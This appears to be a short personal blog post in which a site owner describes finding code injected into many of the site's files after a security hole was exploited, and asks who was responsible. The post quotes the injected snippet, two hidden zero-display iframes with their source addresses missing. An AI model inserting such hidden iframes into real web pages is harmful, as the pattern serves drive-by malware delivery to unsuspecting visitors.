Today, I awoke to find that my website was not quite behaving like normal. I was getting a lot of PHP errors and my brother reported getting a virus warning when logging into my forum. It turns out that someone had exploited a security hole in some software that drives the site. Fortunately, all they did was append a bit of code to files (instead of removing files or something more malicious). Unfortunately, it was quite a few files and it took me a while to fix them all. The files affected all had names containing the words index, login, header, footer, default… things like this. The big of code they included was:
I’m putting it here as I couldn’t find anywhere on the web any description of who these guys were or what the site they were linking back to was about (the site just timed out when I tried to go there directly). So if anyone knows anything about these guys, I’d be interested in hearing about it.
<IFRAME name=’StatPage’ src=’‘ width=5 height=5 style=’display:none’> </IFRAME> <IFRAME name=’StatPage’ src=’ p’ width=5 height=5 style=’display:none’> </IFRAME>
It turns out that the hole was easily fixed by my hosting company, which is nice. But it still caused more stress and wasted effort than I’m happy with.